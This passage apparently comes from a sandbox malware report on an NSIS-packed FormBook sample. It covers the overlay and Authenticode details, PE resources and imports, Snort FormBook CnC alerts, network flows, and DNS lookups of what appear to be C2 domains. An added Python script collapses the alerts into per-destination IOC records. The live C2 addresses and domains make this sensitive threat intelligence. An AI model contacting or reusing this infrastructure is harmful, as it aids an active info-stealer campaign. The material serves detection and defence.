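    print(f"Authenticode blob at 0x{info['security_offset']:x}, ends at EOF: {info['signature_at_eof']}")
    print(f"NSIS first header at offset {info['nsis_header_offset']:#x}")
```

On the sample it builds, mapped section data ends at 0xc200 (49664 bytes) and 643696 bytes of overlay follow, holding the NSIS archive and, from 0xa7228 to the 693360-byte EOF, the Authenticode blob. That overlay is what drives the 7.97 whole-file entropy, since no section in the table exceeds 6.47. Authenticode hashes the overlay as well, so a trusted chain would have vouched for the NSIS archive too; here the chain ends in an untrusted self-signed root, so the signature vouches for nothing.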
Name | RVA | Size | Type | Language | Country
RT_ICON | 0x36268 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216 | English | United States
RT_ICON | 0x38810 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096 | English | United States
RT_ICON | 0x398b8 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024 | English | United States
RT_DIALOG | 0x39d20 | 0x100 | data | English | United States
RT_DIALOG | 0x39e20 | 0x11c | data | English | United States
RT_DIALOG | 0x39f40 | 0xc4 | data | English | United States
RT_DIALOG | 0x3a008 | 0x60 | data | English | United States
RT_GROUP_ICON | 0x3a068 | 0x30 | data | English | United States
RT_VERSION | 0x3a098 | 0x190 | data | English | United States
RT_MANIFEST | 0x3a228 | 0x33e | XML 1.0 document, ASCII text, with very long lines (830), with no line terminators | English | United States
DLL | Import
KERNEL32.dll | GetTempPathA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, SetEnvironmentVariableA, Sleep, GetTickCount, GetCommandLineA, lstrlenA, GetVersion, SetErrorMode, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GetWindowsDirectoryA, SetFileAttributesA, GetLastError, CreateDirectoryA, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, ReadFile, WriteFile, lstrcpyA, MoveFileExA, lstrcatA, GetSystemDirectoryA, GetProcAddress, GetExitCodeProcess, WaitForSingleObject, CompareFileTime, SetFileTime, GetFileAttributesA, SetCurrentDirectoryA, MoveFileA, GetFullPathNameA, GetShortPathNameA, SearchPathA, CloseHandle, lstrcmpiA, CreateThread, GlobalLock, lstrcmpA, DeleteFileA, FindFirstFileA, FindNextFileA, FindClose, SetFilePointer, GetPrivateProfileStringA, WritePrivateProfileStringA, MulDiv, MultiByteToWideChar, FreeLibrary, LoadLibraryExA, GetModuleHandleA, GlobalAlloc, GlobalFree, ExpandEnvironmentStringsA
USER32.dll | GetSystemMenu, SetClassLongA, EnableMenuItem, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, ScreenToClient, GetWindowRect, GetDlgItem, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, EndDialog, RegisterClassA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, LoadImageA, CreateDialogParamA, SetTimer, SetWindowTextA, SetForegroundWindow, ShowWindow, SetWindowLongA, SendMessageTimeoutA, FindWindowExA, IsWindow, AppendMenuA, TrackPopupMenu, CreatePopupMenu, DrawTextA, EndPaint, DestroyWindow, wsprintfA, PostQuitMessage
GDI32.dll | SelectObject, SetTextColor, SetBkMode, CreateFontIndirectA, CreateBrushIndirect, DeleteObject, GetDeviceCaps, SetBkColor
SHELL32.dll | SHGetSpecialFolderLocation, ShellExecuteExA, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, SHFileOperationA
ADVAPI32.dll | AdjustTokenPrivileges, RegCreateKeyExA, RegOpenKeyExA, SetFileSecurityA, OpenProcessToken, LookupPrivilegeValueA, RegEnumValueA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
COMCTL32.dll | ImageList_Create, ImageList_AddMasked, ImageList_Destroy
ole32.dll | OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance
Language of compilation system | Country where language is spoken
English | United States
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
03/20/23-15:06:08.714083 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49916 | 80 | 192.168.11.20 | 2.57.90.16
03/20/23-15:02:43.756679 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49888 | 80 | 192.168.11.20 | 199.192.26.35
03/20/23-15:06:08.714083 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49916 | 80 | 192.168.11.20 | 2.57.90.16
03/20/23-15:02:43.756679 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49888 | 80 | 192.168.11.20 | 199.192.26.35
03/20/23-15:03:18.139935 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49897 | 80 | 192.168.11.20 | 34.117.168.233
03/20/23-15:03:18.139935 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49897 | 80 | 192.168.11.20 | 34.117.168.233
03/20/23-15:06:08.714083 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49916 | 80 | 192.168.11.20 | 2.57.90.16
03/20/23-15:02:43.756679 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49888 | 80 | 192.168.11.20 | 199.192.26.35
03/20/23-15:03:18.139935 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49897 | 80 | 192.168.11.20 | 34.117.168.233
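The nine Snort rows above are three FormBook check-ins, each tripping three ET SIDs on the same packet, so an analyst pulling IOCs wants them collapsed to one record per destination. The script below is an added example, not part of the Joe Sandbox report: it parses Snort alert_fast lines and groups them by destination, keeping the set of SIDs, the distinct client sockets (one per check-in) and first/last seen. ALERTS is constructed in alert_fast layout from the timestamps, SIDs, ports and addresses in the report's table; the Classification and Priority fields are assumptions, as the report does not show them.

```python
"""Collapse Snort alert_fast lines into one record per C2 destination.

Added example, not from the Joe Sandbox report. ALERTS is constructed from
the report's Snort table; classification and priority text are assumed.
"""
import re
from datetime import datetime

# Constructed sample log: the report's nine alerts in alert_fast layout.
ALERTS = """\
03/20/23-15:06:08.714083  [**] [1:2031449:1] ET TROJAN FormBook CnC Checkin (GET) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.11.20:49916 -> 2.57.90.16:80
03/20/23-15:02:43.756679  [**] [1:2031412:1] ET TROJAN FormBook CnC Checkin (GET) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.11.20:49888 -> 199.192.26.35:80
03/20/23-15:06:08.714083  [**] [1:2031412:1] ET TROJAN FormBook CnC Checkin (GET) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.11.20:49916 -> 2.57.90.16:80
03/20/23-15:02:43.756679  [**] [1:2031453:1] ET TROJAN FormBook CnC Checkin (GET) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.11.20:49888 -> 199.192.26.35:80
03/20/23-15:03:18.139935  [**] [1:2031453:1] ET TROJAN FormBook CnC Checkin (GET) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.11.20:49897 -> 34.117.168.233:80
03/20/23-15:03:18.139935  [**] [1:2031412:1] ET TROJAN FormBook CnC Checkin (GET) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.11.20:49897 -> 34.117.168.233:80
03/20/23-15:06:08.714083  [**] [1:2031453:1] ET TROJAN FormBook CnC Checkin (GET) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.11.20:49916 -> 2.57.90.16:80
03/20/23-15:02:43.756679  [**] [1:2031449:1] ET TROJAN FormBook CnC Checkin (GET) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.11.20:49888 -> 199.192.26.35:80
03/20/23-15:03:18.139935  [**] [1:2031449:1] ET TROJAN FormBook CnC Checkin (GET) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.11.20:49897 -> 34.117.168.233:80
"""

# Snort alert_fast: "<ts>  [**] [gid:sid:rev] <msg> [**] [Classification...] [Priority: n] {proto} src:port -> dst:port"
FAST_RE = re.compile(
    r"^(?P<ts>\d\d/\d\d/\d\d-\d\d:\d\d:\d\d\.\d+)\s+\[\*\*\]\s+"
    r"\[(?P<gid>\d+):(?P<sid>\d+):(?P<rev>\d+)\]\s+(?P<msg>.*?)\s+\[\*\*\].*?"
    r"\{(?P<proto>\w+)\}\s+(?P<src>[\d.]+):(?P<sport>\d+)\s+->\s+(?P<dst>[\d.]+):(?P<dport>\d+)\s*$"
)


def parse_fast_alerts(text):
    """Yield one dict per well-formed alert line; lines that do not parse are skipped."""
    for line in text.splitlines():
        m = FAST_RE.match(line)
        if not m:
            continue
        d = m.groupdict()
        d["when"] = datetime.strptime(d["ts"], "%m/%d/%y-%H:%M:%S.%f")
        d["sid"], d["sport"], d["dport"] = int(d["sid"]), int(d["sport"]), int(d["dport"])
        yield d


def summarize_c2(text, msg_filter="CnC"):
    """Group alerts by (dst ip, dst port, proto); several SIDs on one packet count as one contact."""
    by_dst = {}
    for a in parse_fast_alerts(text):
        if msg_filter not in a["msg"]:
            continue
        key = (a["dst"], a["dport"], a["proto"])
        rec = by_dst.setdefault(key, {"sids": set(), "msgs": set(), "flows": set(),
                                      "first": a["when"], "last": a["when"]})
        rec["sids"].add(a["sid"])
        rec["msgs"].add(a["msg"])
        rec["flows"].add((a["src"], a["sport"]))   # distinct client sockets = distinct check-ins
        rec["first"] = min(rec["first"], a["when"])
        rec["last"] = max(rec["last"], a["when"])
    return by_dst


def c2_iocs(text):
    """Destination list in first-seen order, ready for a blocklist or a hunt query."""
    summary = summarize_c2(text)
    ordered = sorted(summary.items(), key=lambda kv: kv[1]["first"])
    return [f"{ip}:{port}" for (ip, port, _proto), _rec in ordered]


if __name__ == "__main__":
    for (ip, port, proto), rec in sorted(summarize_c2(ALERTS).items(), key=lambda kv: kv[1]["first"]):
        print(f"{ip}:{port}/{proto}  first={rec['first'].time()}  "
              f"sids={sorted(rec['sids'])}  check-ins={len(rec['flows'])}")
```

On the constructed input this yields three destinations in the order the sandbox contacted them (199.192.26.35, 34.117.168.233, 2.57.90.16, all on TCP/80), each with the same three SIDs and exactly one client socket, which is the shape a FormBook check-in sweep has: the same GET pattern sent to each host in its configured list.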
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Mar 20, 2023 14:59:24.033808947 CET | 49854 | 443 | 192.168.11.20 | 162.240.73.101
Mar 20, 2023 14:59:24.033935070 CET | 443 | 49854 | 162.240.73.101 | 192.168.11.20
Mar 20, 2023 14:59:24.034235001 CET | 49854 | 443 | 192.168.11.20 | 162.240.73.101
Mar 20, 2023 14:59:24.060362101 CET | 49854 | 443 | 192.168.11.20 | 162.240.73.101
Mar 20, 2023 14:59:24.060436964 CET | 443 | 49854 | 162.240.73.101 | 192.168.11.20
Mar 20, 2023 14:59:24.427198887 CET | 443 | 49854 | 162.240.73.101 | 192.168.11.20
Mar 20, 2023 14:59:24.427412987 CET | 49854 | 443 | 192.168.11.20 | 162.240.73.101
Mar 20, 2023 14:59:24.508608103 CET | 49854 | 443 | 192.168.11.20 | 162.240.73.101
Mar 20, 2023 14:59:24.508704901 CET | 443 | 49854 | 162.240.73.101 | 192.168.11.20
Mar 20, 2023 14:59:24.509831905 CET | 443 | 49854 | 162.240.73.101 | 192.168.11.20
Mar 20, 2023 14:59:24.509990931 CET | 49854 | 443 | 192.168.11.20 | 162.240.73.101
Mar 20, 2023 14:59:24.512862921 CET | 49854 | 443 | 192.168.11.20 | 162.240.73.101
Mar 20, 2023 14:59:24.556482077 CET | 443 | 49854 | 162.240.73.101 | 192.168.11.20
Mar 20, 2023 14:59:24.778146982 CET | 443 | 49854 | 162.240.73.101 | 192.168.11.20
Mar 20, 2023 14:59:24.778325081 CET | 443 | 49854 | 162.240.73.101 | 192.168.11.20
Mar 20, 2023 14:59:24.778374910 CET | 49854 | 443 | 192.168.11.20 | 162.240.73.101
Mar 20, 2023 14:59:24.778425932 CET | 443 | 49854 | 162.240.73.101 | 192.168.11.20
Mar 20, 2023 14:59:24.778567076 CET | 49854 | 443 | 192.168.11.20 | 162.240.73.101
Mar 20, 2023 14:59:24.778614998 CET | 443 | 49854 | 162.240.73.101 | 192.168.11.20
Mar 20, 2023 14:59:24.778783083 CET | 49854 | 443 | 192.168.11.20 | 162.240.73.101
Mar 20, 2023 14:59:24.966623068 CET | 443 | 49854 | 162.240.73.101 | 192.168.11.20
Mar 20, 2023 14:59:24.966803074 CET | 49854 | 443 | 192.168.11.20 | 162.240.73.101
Mar 20, 2023 14:59:24.966898918 CET | 49854 | 443 | 192.168.11.20 | 162.240.73.101
Mar 20, 2023 14:59:24.967082977 CET | 443 | 49854 | 162.240.73.101 | 192.168.11.20
Mar 20, 2023 14:59:24.967226028 CET | 49854 | 443 | 192.168.11.20 | 162.240.73.101
Mar 20, 2023 14:59:24.967226028 CET | 49854 | 443 | 192.168.11.20 | 162.240.73.101
Mar 20, 2023 14:59:24.967276096 CET | 49854 | 443 | 192.168.11.20 | 162.240.73.101
Mar 20, 2023 14:59:24.967276096 CET | 49854 | 443 | 192.168.11.20 | 162.240.73.101
Mar 20, 2023 14:59:24.967324972 CET | 49854 | 443 | 192.168.11.20 | 162.240.73.101
Mar 20, 2023 14:59:24.967325926 CET | 49854 | 443 | 192.168.11.20 | 162.240.73.101
Mar 20, 2023 14:59:24.967458010 CET | 443 | 49854 | 162.240.73.101 | 192.168.11.20
Mar 20, 2023 14:59:24.967648029 CET | 49854 | 443 | 192.168.11.20 | 162.240.73.101
Mar 20, 2023 14:59:24.967648029 CET | 49854 | 443 | 192.168.11.20 | 162.240.73.101
Mar 20, 2023 14:59:24.967648029 CET | 49854 | 443 | 192.168.11.20 | 162.240.73.101
Mar 20, 2023 14:59:24.967648029 CET | 49854 | 443 | 192.168.11.20 | 162.240.73.101
Mar 20, 2023 14:59:24.967648029 CET | 49854 | 443 | 192.168.11.20 | 162.240.73.101
Mar 20, 2023 14:59:24.967648029 CET | 49854 | 443 | 192.168.11.20 | 162.240.73.101
Mar 20, 2023 14:59:25.038048029 CET | 443 | 49854 | 162.240.73.101 | 192.168.11.20
Mar 20, 2023 14:59:25.038404942 CET | 49854 | 443 | 192.168.11.20 | 162.240.73.101
Mar 20, 2023 14:59:25.038405895 CET | 49854 | 443 | 192.168.11.20 | 162.240.73.101
Mar 20, 2023 14:59:25.145059109 CET | 443 | 49854 | 162.240.73.101 | 192.168.11.20
Mar 20, 2023 14:59:25.145308971 CET | 49854 | 443 | 192.168.11.20 | 162.240.73.101
Mar 20, 2023 14:59:25.145541906 CET | 443 | 49854 | 162.240.73.101 | 192.168.11.20
Mar 20, 2023 14:59:25.145730019 CET | 49854 | 443 | 192.168.11.20 | 162.240.73.101
Mar 20, 2023 14:59:25.145730972 CET | 49854 | 443 | 192.168.11.20 | 162.240.73.101
Mar 20, 2023 14:59:25.145847082 CET | 49854 | 443 | 192.168.11.20 | 162.240.73.101
Mar 20, 2023 14:59:25.146064997 CET | 443 | 49854 | 162.240.73.101 | 192.168.11.20
Mar 20, 2023 14:59:25.146250963 CET | 49854 | 443 | 192.168.11.20 | 162.240.73.101
Mar 20, 2023 14:59:25.146250963 CET | 49854 | 443 | 192.168.11.20 | 162.240.73.101
Mar 20, 2023 14:59:25.146545887 CET | 443 | 49854 | 162.240.73.101 | 192.168.11.20
Mar 20, 2023 14:59:25.146800041 CET | 49854 | 443 | 192.168.11.20 | 162.240.73.101
Mar 20, 2023 14:59:25.146908045 CET | 443 | 49854 | 162.240.73.101 | 192.168.11.20
Mar 20, 2023 14:59:25.147145033 CET | 49854 | 443 | 192.168.11.20 | 162.240.73.101
Mar 20, 2023 14:59:25.147195101 CET | 49854 | 443 | 192.168.11.20 | 162.240.73.101
Mar 20, 2023 14:59:25.172271967 CET | 443 | 49854 | 162.240.73.101 | 192.168.11.20
Mar 20, 2023 14:59:25.172553062 CET | 49854 | 443 | 192.168.11.20 | 162.240.73.101
Mar 20, 2023 14:59:25.172553062 CET | 49854 | 443 | 192.168.11.20 | 162.240.73.101
Mar 20, 2023 14:59:25.324282885 CET | 443 | 49854 | 162.240.73.101 | 192.168.11.20
Mar 20, 2023 14:59:25.324558020 CET | 49854 | 443 | 192.168.11.20 | 162.240.73.101
Mar 20, 2023 14:59:25.324558973 CET | 49854 | 443 | 192.168.11.20 | 162.240.73.101
Mar 20, 2023 14:59:25.324791908 CET | 443 | 49854 | 162.240.73.101 | 192.168.11.20
Mar 20, 2023 14:59:25.324982882 CET | 49854 | 443 | 192.168.11.20 | 162.240.73.101
Mar 20, 2023 14:59:25.325077057 CET | 49854 | 443 | 192.168.11.20 | 162.240.73.101
Mar 20, 2023 14:59:25.325248003 CET | 443 | 49854 | 162.240.73.101 | 192.168.11.20
Mar 20, 2023 14:59:25.325452089 CET | 49854 | 443 | 192.168.11.20 | 162.240.73.101
Mar 20, 2023 14:59:25.325453043 CET | 49854 | 443 | 192.168.11.20 | 162.240.73.101
Mar 20, 2023 14:59:25.325793028 CET | 443 | 49854 | 162.240.73.101 | 192.168.11.20
Mar 20, 2023 14:59:25.326028109 CET | 49854 | 443 | 192.168.11.20 | 162.240.73.101
Mar 20, 2023 14:59:25.326433897 CET | 443 | 49854 | 162.240.73.101 | 192.168.11.20
Mar 20, 2023 14:59:25.326648951 CET | 49854 | 443 | 192.168.11.20 | 162.240.73.101
Mar 20, 2023 14:59:25.326648951 CET | 49854 | 443 | 192.168.11.20 | 162.240.73.101
Mar 20, 2023 14:59:25.326991081 CET | 443 | 49854 | 162.240.73.101 | 192.168.11.20
Mar 20, 2023 14:59:25.327177048 CET | 49854 | 443 | 192.168.11.20 | 162.240.73.101
Mar 20, 2023 14:59:25.327271938 CET | 49854 | 443 | 192.168.11.20 | 162.240.73.101
Mar 20, 2023 14:59:25.327522993 CET | 443 | 49854 | 162.240.73.101 | 192.168.11.20
Mar 20, 2023 14:59:25.327728033 CET | 49854 | 443 | 192.168.11.20 | 162.240.73.101
Mar 20, 2023 14:59:25.327728987 CET | 49854 | 443 | 192.168.11.20 | 162.240.73.101
Mar 20, 2023 14:59:25.327786922 CET | 49854 | 443 | 192.168.11.20 | 162.240.73.101
Mar 20, 2023 14:59:25.328250885 CET | 443 | 49854 | 162.240.73.101 | 192.168.11.20
Mar 20, 2023 14:59:25.328428984 CET | 49854 | 443 | 192.168.11.20 | 162.240.73.101
Mar 20, 2023 14:59:25.328510046 CET | 49854 | 443 | 192.168.11.20 | 162.240.73.101
Mar 20, 2023 14:59:25.328537941 CET | 443 | 49854 | 162.240.73.101 | 192.168.11.20
Mar 20, 2023 14:59:25.328687906 CET | 443 | 49854 | 162.240.73.101 | 192.168.11.20
Mar 20, 2023 14:59:25.328700066 CET | 49854 | 443 | 192.168.11.20 | 162.240.73.101
Mar 20, 2023 14:59:25.328701019 CET | 49854 | 443 | 192.168.11.20 | 162.240.73.101
Mar 20, 2023 14:59:25.328805923 CET | 49854 | 443 | 192.168.11.20 | 162.240.73.101
Mar 20, 2023 14:59:25.328820944 CET | 443 | 49854 | 162.240.73.101 | 192.168.11.20
Mar 20, 2023 14:59:25.328887939 CET | 49854 | 443 | 192.168.11.20 | 162.240.73.101
Mar 20, 2023 14:59:25.328887939 CET | 49854 | 443 | 192.168.11.20 | 162.240.73.101
Mar 20, 2023 14:59:25.328901052 CET | 443 | 49854 | 162.240.73.101 | 192.168.11.20
Mar 20, 2023 14:59:25.328984022 CET | 49854 | 443 | 192.168.11.20 | 162.240.73.101
Mar 20, 2023 14:59:25.328989983 CET | 443 | 49854 | 162.240.73.101 | 192.168.11.20
Mar 20, 2023 14:59:25.329138994 CET | 49854 | 443 | 192.168.11.20 | 162.240.73.101
Mar 20, 2023 14:59:25.349490881 CET | 443 | 49854 | 162.240.73.101 | 192.168.11.20
Mar 20, 2023 14:59:25.349739075 CET | 443 | 49854 | 162.240.73.101 | 192.168.11.20
Mar 20, 2023 14:59:25.349828959 CET | 49854 | 443 | 192.168.11.20 | 162.240.73.101
Mar 20, 2023 14:59:25.349863052 CET | 443 | 49854 | 162.240.73.101 | 192.168.11.20
Mar 20, 2023 14:59:25.349932909 CET | 49854 | 443 | 192.168.11.20 | 162.240.73.101
Mar 20, 2023 14:59:25.349932909 CET | 49854 | 443 | 192.168.11.20 | 162.240.73.101
Mar 20, 2023 14:59:25.349980116 CET | 443 | 49854 | 162.240.73.101 | 192.168.11.20
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Mar 20, 2023 14:59:23.986933947 CET | 55979 | 53 | 192.168.11.20 | 1.1.1.1
Mar 20, 2023 14:59:24.022195101 CET | 53 | 55979 | 1.1.1.1 | 192.168.11.20
Mar 20, 2023 15:00:57.209255934 CET | 64824 | 53 | 192.168.11.20 | 1.1.1.1
Mar 20, 2023 15:00:57.344244003 CET | 53 | 64824 | 1.1.1.1 | 192.168.11.20
Mar 20, 2023 15:01:12.579010010 CET | 56171 | 53 | 192.168.11.20 | 1.1.1.1
Mar 20, 2023 15:01:12.820903063 CET | 53 | 56171 | 1.1.1.1 | 192.168.11.20
Mar 20, 2023 15:01:26.075973034 CET | 51349 | 53 | 192.168.11.20 | 1.1.1.1
Mar 20, 2023 15:01:26.229600906 CET | 53 | 51349 | 1.1.1.1 | 192.168.11.20
Mar 20, 2023 15:01:40.322607040 CET | 55818 | 53 | 192.168.11.20 | 1.1.1.1
Mar 20, 2023 15:01:40.492297888 CET | 53 | 55818 | 1.1.1.1 | 192.168.11.20
Mar 20, 2023 15:01:53.163575888 CET | 49654 | 53 | 192.168.11.20 | 1.1.1.1
Mar 20, 2023 15:01:53.478986025 CET | 53 | 49654 | 1.1.1.1 | 192.168.11.20
Mar 20, 2023 15:02:07.286457062 CET | 57556 | 53 | 192.168.11.20 | 1.1.1.1
Mar 20, 2023 15:02:07.773430109 CET | 53 | 57556 | 1.1.1.1 | 192.168.11.20
Mar 20, 2023 15:02:21.642059088 CET | 59119 | 53 | 192.168.11.20 | 1.1.1.1
Mar 20, 2023 15:02:21.773844957 CET | 53 | 59119 | 1.1.1.1 | 192.168.11.20
Mar 20, 2023 15:02:34.467154980 CET | 57902 | 53 | 192.168.11.20 | 1.1.1.1
Mar 20, 2023 15:02:34.487951040 CET | 53 | 57902 | 1.1.1.1 | 192.168.11.20
Mar 20, 2023 15:02:49.027229071 CET | 57928 | 53 | 192.168.11.20 | 1.1.1.1
Mar 20, 2023 15:02:49.039752960 CET | 53 | 57928 | 1.1.1.1 | 192.168.11.20
Mar 20, 2023 15:02:57.088443041 CET | 57075 | 53 | 192.168.11.20 | 1.1.1.1
Mar 20, 2023 15:02:57.106502056 CET | 53 | 57075 | 1.1.1.1 | 192.168.11.20
Mar 20, 2023 15:03:09.850024939 CET | 51054 | 53 | 192.168.11.20 | 1.1.1.1
Mar 20, 2023 15:03:09.895483017 CET | 53 | 51054 | 1.1.1.1 | 192.168.11.20
Mar 20, 2023 15:03:23.206232071 CET | 63254 | 53 | 192.168.11.20 | 1.1.1.1
Mar 20, 2023 15:03:23.785859108 CET | 53 | 63254 | 1.1.1.1 | 192.168.11.20
Mar 20, 2023 15:05:32.255992889 CET | 50211 | 53 | 192.168.11.20 | 1.1.1.1
Mar 20, 2023 15:05:32.398036003 CET | 53 | 50211 | 1.1.1.1 | 192.168.11.20
Mar 20, 2023 15:05:45.050076008 CET | 57862 | 53 | 192.168.11.20 | 1.1.1.1
Mar 20, 2023 15:05:45.096679926 CET | 53 | 57862 | 1.1.1.1 | 192.168.11.20
Mar 20, 2023 15:06:00.828131914 CET | 63777 | 53 | 192.168.11.20 | 1.1.1.1
Mar 20, 2023 15:06:00.844289064 CET | 53 | 63777 | 1.1.1.1 | 192.168.11.20
Mar 20, 2023 15:06:00.844810009 CET | 63777 | 53 | 192.168.11.20 | 9.9.9.9
Mar 20, 2023 15:06:01.021074057 CET | 53 | 63777 | 9.9.9.9 | 192.168.11.20
Mar 20, 2023 15:06:13.747261047 CET | 50034 | 53 | 192.168.11.20 | 1.1.1.1
Mar 20, 2023 15:06:13.762650013 CET | 53 | 50034 | 1.1.1.1 | 192.168.11.20
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Mar 20, 2023 14:59:23.986933947 CET | 192.168.11.20 | 1.1.1.1 | 0xa95c | Standard query (0) | www.wittofitentertainment.com | A (IP address) | IN (0x0001) | false
Mar 20, 2023 15:00:57.209255934 CET | 192.168.11.20 | 1.1.1.1 | 0x3b51 | Standard query (0) | www.interactive-media.ru | A (IP address) | IN (0x0001) | false
Mar 20, 2023 15:01:12.579010010 CET | 192.168.11.20 | 1.1.1.1 | 0x2a3a | Standard query (0) | www.cardinialethanol.com | A (IP address) | IN (0x0001) | false
Mar 20, 2023 15:01:26.075973034 CET | 192.168.11.20 | 1.1.1.1 | 0xa606 | Standard query (0) | www.flaviosilva.online | A (IP address) | IN (0x0001) | false
Mar 20, 2023 15:01:40.322607040 CET | 192.168.11.20 | 1.1.1.1 | 0x6b08 | Standard query (0) | www.solya-shop.com | A (IP address) | IN (0x0001) | false
Mar 20, 2023 15:01:53.163575888 CET | 192.168.11.20 | 1.1.1.1 | 0xd39d | Standard query (0) | www.buymyenergy.com | A (IP address) | IN (0x0001) | false
Mar 20, 2023 15:02:07.286457062 CET | 192.168.11.20 | 1.1.1.1 | 0xb9b5 | Standard query (0) | www.184411.com | A (IP address) | IN (0x0001) | false
Mar 20, 2023 15:02:21.642059088 CET | 192.168.11.20 | 1.1.1.1 | 0x2ed3 | Standard query (0) | www.b-tek.media | A (IP address) | IN (0x0001) | false
Mar 20, 2023 15:02:34.467154980 CET | 192.168.11.20 | 1.1.1.1 | 0x63a6 | Standard query (0) | www.dexmart.xyz | A (IP address) | IN (0x0001) | false
Mar 20, 2023 15:02:49.027229071 CET | 192.168.11.20 | 1.1.1.1 | 0x213f | Standard query (0) | www.finelinetackdirect.com | A (IP address) | IN (0x0001) | false
Mar 20, 2023 15:02:57.088443041 CET | 192.168.11.20 | 1.1.1.1 | 0x4754 | Standard query (0) | www.maxhaidt.com | A (IP address) | IN (0x0001) | false
Mar 20, 2023 15:03:09.850024939 CET | 192.168.11.20 | 1.1.1.1 | 0x800e | Standard query (0) | www.ghostdyes.net | A (IP address) | IN (0x0001) | false
Mar 20, 2023 15:03:23.206232071 CET | 192.168.11.20 | 1.1.1.1 | 0x83fe | Standard query (0) | www.aznqmd.com | A (IP address) | IN (0x0001) | false
Mar 20, 2023 15:05:32.255992889 CET | 192.168.11.20 | 1.1.1.1 | 0xef87 | Standard query (0) | www.texasgent.com | A (IP address) | IN (0x0001) | false
Mar 20, 2023 15:05:45.050076008 CET | 192.168.11.20 | 1.1.1.1 | 0x7eb | Standard query (0) | www.brightfms.com | A (IP address) | IN (0x0001) | false
Mar 20, 2023 15:06:00.828131914 CET | 192.168.11.20 | 1.1.1.1 | 0x337e | Standard query (0) | www.eta-trader.net | A (IP address) | IN (0x0001) | false
Mar 20, 2023 15:06:00.844810009 CET | 192.168.11.20 | 9.9.9.9 | 0x337e | Standard query (0) | www.eta-trader.net | A (IP address) | IN (0x0001) | false
Mar 20, 2023 15:06:13.747261047 CET | 192.168.11.20 | 1.1.1.1 | 0xa8c8 | Standard query (0) | www.funvacayflorida.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Mar 20, 2023 14:59:24.022195101 CET | 1.1.1.1 | 192.168.11.20 | 0xa95c | No error (0) | www.wittofitentertainment.com | | 162.240.73.101 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 15:00:57.344244003 CET | 1.1.1.1 | 192.168.11.20 | 0x3b51 | No error (0) | www.interactive-media.ru | | 88.212.206.251 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 15:01:12.820903063 CET | 1.1.1.1 | 192.168.11.20 | 0x2a3a | No error (0) | www.cardinialethanol.com | | 198.58.118.167 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 15:01:12.820903063 CET | 1.1.1.1 | 192.168.11.20 | 0x2a3a | No error (0) | www.cardinialethanol.com | | 45.33.18.44 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 15:01:12.820903063 CET | 1.1.1.1 | 192.168.11.20 | 0x2a3a | No error (0) | www.cardinialethanol.com | | 45.56.79.23 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 15:01:12.820903063 CET | 1.1.1.1 | 192.168.11.20 | 0x2a3a | No error (0) | www.cardinialethanol.com | | 45.79.19.196 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 15:01:12.820903063 CET | 1.1.1.1 | 192.168.11.20 | 0x2a3a | No error (0) | www.cardinialethanol.com | | 45.33.30.197 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 15:01:12.820903063 CET | 1.1.1.1 | 192.168.11.20 | 0x2a3a | No error (0) | www.cardinialethanol.com | | 72.14.185.43 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 15:01:12.820903063 CET | 1.1.1.1 | 192.168.11.20 | 0x2a3a | No error (0) | www.cardinialethanol.com | | 45.33.20.235 | A (IP address) | IN (0x0001) | false
